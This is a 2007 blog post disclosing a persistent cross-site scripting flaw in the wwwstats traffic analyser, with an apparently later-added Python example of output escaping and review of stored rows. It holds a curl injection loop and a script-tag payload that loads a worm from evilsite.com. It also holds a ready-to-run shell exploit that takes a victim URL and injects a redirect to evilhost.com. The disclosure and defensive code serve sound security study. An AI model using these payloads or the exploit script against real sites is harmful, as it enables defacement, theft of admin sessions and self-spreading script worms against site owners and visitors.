Thursday, December 27, 2007

wwwstats vulnerable to Persistent XSS

wwwstats is a very widely used web traffic analyser that records user agents, referers, downloads, etc. in a database.

I discovered a way to inject HTML and JavaScript into the database by calling the clickstats.php script directly. This would allow mass defacement, stealing admin sessions, web redirection, XSS worms, Google-bombing and Google-ranking manipulation.

To get past the first 'if', the HTTP Referer header must be non-empty; the link is then injected into the database through the link GET parameter.

An attacker can use the link parameter or the user agent field to inject a script that steals the admin's cookies, defaces the page, or anything else.

If magic quotes are enabled in php.ini, this is no obstacle: magic_quotes_gpc only backslash-escapes quote characters and leaves the angle brackets of the tags untouched, and in JavaScript \'test\' is interpreted as 'test'.

By controlling the number of iterations, the injection can be placed at whatever ranking position you want:

while [ 1 ]; do curl 'http://web.com/wwwstats/clickstats.php?link=<script>XXXX</script>' -e 'xxx'; done

Injection through the user agent is also possible: -A 'attack'

A payload can be:

<script src='http://evilsite.com/XSSWorm.js'></script>
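The following Python script is an added example and is not code from the original post or from wwwstats. It models the two points made above: PHP's magic_quotes_gpc (emulated here with an addslashes() helper) backslash-escapes quotes but leaves tag markup intact, so only HTML-encoding the stored value at output time neutralises it; and a simple review of the stored link, referer and user-agent fields for markup, run over constructed sample rows, surfaces injections like the ones described. The field names, the sample rows and the example hostnames are assumptions, not wwwstats' actual schema or data.

```python
import html
import re

# Emulates PHP's magic_quotes_gpc / addslashes(): backslash-escapes ' " \ and NUL.
# Note that it does NOT touch '<' or '>', so tag markup passes through untouched.
def addslashes(value: str) -> str:
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"')
                 .replace("\0", "\\0"))


def render_unsafe(value: str) -> str:
    """Models the vulnerable pattern: a stored field is concatenated straight into HTML."""
    return f"<td>{value}</td>"


def render_safe(value: str) -> str:
    """Hardened pattern: HTML-encode at output time, so < > & ' " become entities."""
    return f"<td>{html.escape(value, quote=True)}</td>"


# Heuristic for reviewing stored stats rows: a tag opener, a javascript: URL,
# or an inline event handler. It is meant to surface rows for a human to look
# at, not to block requests (it will also match harmless values such as "?on=1").
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z!?]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)

# Field names follow the data the post says wwwstats records (assumption).
REVIEWED_FIELDS = ("link", "referer", "user_agent")


def flag_suspicious(rows):
    """Return (row_index, field, value) for every reviewed field that contains markup."""
    hits = []
    for idx, row in enumerate(rows):
        for field in REVIEWED_FIELDS:
            value = row.get(field, "")
            if MARKUP_RE.search(value):
                hits.append((idx, field, value))
    return hits


# Constructed sample rows, standing in for what clickstats.php would have stored.
SAMPLE_ROWS = [
    {"link": "http://www.example.com/files/report.pdf",
     "referer": "http://www.example.com/downloads/",
     "user_agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"link": "<script src='http://evilsite.example/XSSWorm.js'></script>",
     "referer": "xxx",
     "user_agent": "curl/7.16.4"},
    {"link": "http://www.example.com/files/archive.zip",
     "referer": "attack",
     "user_agent": "<script>window.location='http://evilhost.example'</script>"},
]


if __name__ == "__main__":
    payload = "<script>alert('x')</script>"
    # Magic quotes only adds backslashes inside the script; the tag itself survives.
    print("magic quotes output :", render_unsafe(addslashes(payload)))
    # Output encoding turns the tag into inert text.
    print("escaped output      :", render_safe(payload))
    for idx, field, value in flag_suspicious(SAMPLE_ROWS):
        print(f"row {idx}: suspicious {field}: {value}")
```

Running the script prints the magic-quotes rendering with the script tag intact, the entity-encoded rendering, and the two constructed rows whose link and user-agent fields carry markup. The same review can be pointed at a dump of the real stats table to find out whether a site has already been hit.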

------------Exploit------------
#!/bin/sh
#jolmos (at) isecauditors (dot) com
# Arguments: <wwwstats url> <html or javascript to inject> <iterations>

if [ $# -ne 3 ]
then
echo "Usage: $0 <wwwstats url> <html or javascript to inject in downloads> <iterations>"
echo "Example: $0 http://www.victym.com/wwwstats '<script>window.location=\"http://www.evilhost.com\"</script>' 100"
exit 1
fi

echo 'Attacking, wait a moment'
# One request per iteration; -e sets the Referer so the first check in clickstats.php passes
for i in $(seq 1 "$3"); do curl "$1/clickstats.php?link=$2" -e 'attack'; done


External links:
http://www.securityfocus.com/bid/26759
http://secunia.com/advisories/28002